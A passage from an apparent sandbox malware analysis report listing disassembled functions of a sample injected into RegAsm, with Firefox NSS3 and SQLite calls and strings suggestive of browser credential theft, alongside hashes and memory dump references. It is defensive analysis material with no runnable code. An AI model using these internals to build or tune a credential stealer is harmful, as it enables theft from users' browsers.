                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: strtok_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 3330995566-0
                                                                                                        • Opcode ID: 264f35a48c595a1dd1d23ce806c08b0664bc3f9f1fea006674d365e83df1677c
                                                                                                        • Instruction ID: 735330a1d008a833b374886be4d947a81621c86a210c44f2da093846d2bcbd8c
                                                                                                        • Opcode Fuzzy Hash: 264f35a48c595a1dd1d23ce806c08b0664bc3f9f1fea006674d365e83df1677c
                                                                                                        • Instruction Fuzzy Hash: 64319671E001099FCB14DF68CC85BAA77A8BB08717F51505BEC05DA191EB7CCB818B4C
                                                                                                        APIs
                                                                                                        • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C1B2D1A), ref: 6C1C2E7E
                                                                                                          • Part of subcall function 6C2107B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C1B8298,?,?,?,6C1AFCE5,?), ref: 6C2107BF
                                                                                                          • Part of subcall function 6C2107B0: PL_HashTableLookup.NSS3(?,?), ref: 6C2107E6
                                                                                                          • Part of subcall function 6C2107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C21081B
                                                                                                          • Part of subcall function 6C2107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C210825
                                                                                                        • PR_Now.NSS3 ref: 6C1C2EDF
                                                                                                        • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C1C2EE9
                                                                                                        • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C1B2D1A), ref: 6C1C2F01
                                                                                                        • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C1B2D1A), ref: 6C1C2F50
                                                                                                        • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C1C2F81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                        • String ID:
                                                                                                        • API String ID: 287051776-0
                                                                                                        • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                        • Instruction ID: 3152add54283efefe95e402e6ac7d2479fdf1ff15fcc91707b3276571d02708e
                                                                                                        • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                        • Instruction Fuzzy Hash: 8031047170110C87F710C755CC58BAE7265EBB1318F2415BAF51997AD0EB3D9846CA23
                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C0EDC60
                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C0ED38A,?), ref: 6C0EDC6F
                                                                                                        • free.MOZGLUE(?,?,?,?,?,6C0ED38A,?), ref: 6C0EDCC1
                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C0ED38A,?), ref: 6C0EDCE9
                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C0ED38A,?), ref: 6C0EDD05
                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C0ED38A,?), ref: 6C0EDD4A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 1842996449-0
                                                                                                        APIs
                                                                                                        • CERT_DecodeAVAValue.NSS3(?,?,6C1B0A2C), ref: 6C1B0E0F
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C1B0A2C), ref: 6C1B0E73
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C1B0A2C), ref: 6C1B0E85
                                                                                                        • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C1B0A2C), ref: 6C1B0E90
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1B0EC4
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C1B0A2C), ref: 6C1B0ED9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3618544408-0
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C1D0725,00000000,00000058), ref: 6C1C8906
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1C891A
                                                                                                        • PL_ArenaAllocate.NSS3(?,?), ref: 6C1C894A
                                                                                                        • calloc.MOZGLUE(00000001,6C1D072D,00000000,00000000,00000000,?,6C1D0725,00000000,00000058), ref: 6C1C8959
                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C1C8993
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1C89AF
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1716546843-0
                                                                                                        APIs
                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C1BAEB3
                                                                                                        • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C1BAECA
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1BAEDD
                                                                                                        • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C1BAF02
                                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C2D9500), ref: 6C1BAF23
                                                                                                          • Part of subcall function 6C20F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C20F0C8
                                                                                                          • Part of subcall function 6C20F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C20F122
                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C1BAF37
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                        • String ID:
                                                                                                        • API String ID: 3714604333-0
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C23EE85
                                                                                                        • realloc.MOZGLUE(6F09BAB5,?), ref: 6C23EEAE
                                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C23EEC5
                                                                                                          • Part of subcall function 6C210BE0: malloc.MOZGLUE(6C208D2D,?,00000000,?), ref: 6C210BF8
                                                                                                          • Part of subcall function 6C210BE0: TlsGetValue.KERNEL32(6C208D2D,?,00000000,?), ref: 6C210C15
                                                                                                        • htonl.WSOCK32(?), ref: 6C23EEE3
                                                                                                        • htonl.WSOCK32(00000000,?), ref: 6C23EEED
                                                                                                        • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C23EF01
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1351805024-0
                                                                                                        APIs
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C1EEE49
                                                                                                          • Part of subcall function 6C20FAB0: free.MOZGLUE(?,-00000001,?,?,6C1AF673,00000000,00000000), ref: 6C20FAC7
                                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C1EEE5C
                                                                                                        • PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C1EEE77
                                                                                                        • PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C1EEE9D
                                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C1EEEB3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
                                                                                                        • String ID:
                                                                                                        • API String ID: 886189093-0
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C204EB8,?), ref: 6C204884
                                                                                                          • Part of subcall function 6C208800: TlsGetValue.KERNEL32(?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208821
                                                                                                          • Part of subcall function 6C208800: TlsGetValue.KERNEL32(?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C20883D
                                                                                                          • Part of subcall function 6C208800: EnterCriticalSection.KERNEL32(?,?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208856
                                                                                                          • Part of subcall function 6C208800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C208887
                                                                                                          • Part of subcall function 6C208800: PR_Unlock.NSS3(?,?,?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208899
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C204EB8,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C20484C
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C204EB8,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C20486D
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204899
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2048A9
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2048B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2226052791-0
                                                                                                        APIs
                                                                                                        • PR_NewMonitor.NSS3(00000000,?,6C24AA9B,?,?,?,?,?,?,?,00000000,?,6C2480C1), ref: 6C246846
                                                                                                          • Part of subcall function 6C1A1770: calloc.MOZGLUE(00000001,0000019C,?,6C1A15C2,?,?,?,?,?,00000001,00000040), ref: 6C1A178D
                                                                                                        • PR_NewMonitor.NSS3(00000000,?,6C24AA9B,?,?,?,?,?,?,?,00000000,?,6C2480C1), ref: 6C246855
                                                                                                          • Part of subcall function 6C208680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C1B55D0,00000000,00000000), ref: 6C20868B
                                                                                                          • Part of subcall function 6C208680: PR_NewLock.NSS3(00000000,00000000), ref: 6C2086A0
                                                                                                          • Part of subcall function 6C208680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C2086B2
                                                                                                          • Part of subcall function 6C208680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C2086C8
                                                                                                          • Part of subcall function 6C208680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C2086E2
                                                                                                          • Part of subcall function 6C208680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C2086EC
                                                                                                          • Part of subcall function 6C208680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C208700
                                                                                                        • PR_NewMonitor.NSS3(?,6C24AA9B,?,?,?,?,?,?,?,00000000,?,6C2480C1), ref: 6C24687D
                                                                                                          • Part of subcall function 6C1A1770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C1A18DE
                                                                                                          • Part of subcall function 6C1A1770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C1A18F1
                                                                                                        • PR_NewMonitor.NSS3(?,6C24AA9B,?,?,?,?,?,?,?,00000000,?,6C2480C1), ref: 6C24688C
                                                                                                          • Part of subcall function 6C1A1770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C1A18FC
                                                                                                          • Part of subcall function 6C1A1770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C1A198A
                                                                                                        • PR_NewLock.NSS3 ref: 6C2468A5
                                                                                                          • Part of subcall function 6C2798D0: calloc.MOZGLUE(00000001,00000084,6C1A0936,00000001,?,6C1A102C), ref: 6C2798E5
                                                                                                        • PR_NewLock.NSS3 ref: 6C2468B4
                                                                                                          • Part of subcall function 6C2798D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C279946
                                                                                                          • Part of subcall function 6C2798D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C1316B7,00000000), ref: 6C27994E
                                                                                                          • Part of subcall function 6C2798D0: free.MOZGLUE(00000000), ref: 6C27995E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 200661885-0
                                                                                                        • Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                        • Instruction ID: f47379ce1f2406ffdd44abb8fd56e98010375efb51447f8e39abc67c31977172
                                                                                                        • Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                        • Instruction Fuzzy Hash: D7011DB4A02F0B87E7656BB688503E777E55F02289F10443E9C69C6B40EF71D40CCBA1
                                                                                                        APIs
                                                                                                        • StrStrA.SHLWAPI(?,00000000,?,?,?,00413794,00000000,00000010), ref: 00412119
                                                                                                        • lstrcpynA.KERNEL32(C:\Users\user\Desktop\,?,00000000,?), ref: 00412132
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00412144
                                                                                                        • wsprintfA.USER32 ref: 00412156
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpynlstrlenwsprintf
                                                                                                        • String ID: %s%s$C:\Users\user\Desktop\
                                                                                                        • API String ID: 1206339513-438050915
                                                                                                        • Opcode ID: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
                                                                                                        • Instruction ID: 2b65b01ea0560ea7e18c8daf8da5e1637e4a778ce13f385dfd922e5b6f13eae1
                                                                                                        • Opcode Fuzzy Hash: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
                                                                                                        • Instruction Fuzzy Hash: 83F0E9322002157FDF091F99DC48D9B7FAEDF45666F000061F908D2211C6775F1586E5
                                                                                                        APIs
                                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C19AFDA
                                                                                                        Strings
                                                                                                        • misuse, xrefs: 6C19AFCE
                                                                                                        • unable to delete/modify collation sequence due to active statements, xrefs: 6C19AF5C
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C19AFD3
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C19AFC4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_log
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                        • API String ID: 632333372-924978290
                                                                                                        • Opcode ID: 2298380a7cfdb3693c1837d60838e9f8ff045e7f7a0ac8d867fd89a2025925dc
                                                                                                        • Instruction ID: 44a1ab830afd435141be5bafa526e1cf5a665ded0d6bc1f42d2a3594240d86ba
                                                                                                        • Opcode Fuzzy Hash: 2298380a7cfdb3693c1837d60838e9f8ff045e7f7a0ac8d867fd89a2025925dc
                                                                                                        • Instruction Fuzzy Hash: 1C91E275E012158FDB04CF29C850BAEB7F1BF49314F1945A8E865ABB91C734EC05CBA0
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00408307
                                                                                                        • LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 0040833C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocLocal_memset
                                                                                                        • String ID: ERROR_RUN_EXTRACTOR$v10$v20
                                                                                                        • API String ID: 52611349-380572819
                                                                                                        • Opcode ID: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
                                                                                                        • Instruction ID: daba9ed892d092cabdd565eab6a30784efdfa5406d791c1b040b6213e04440cf
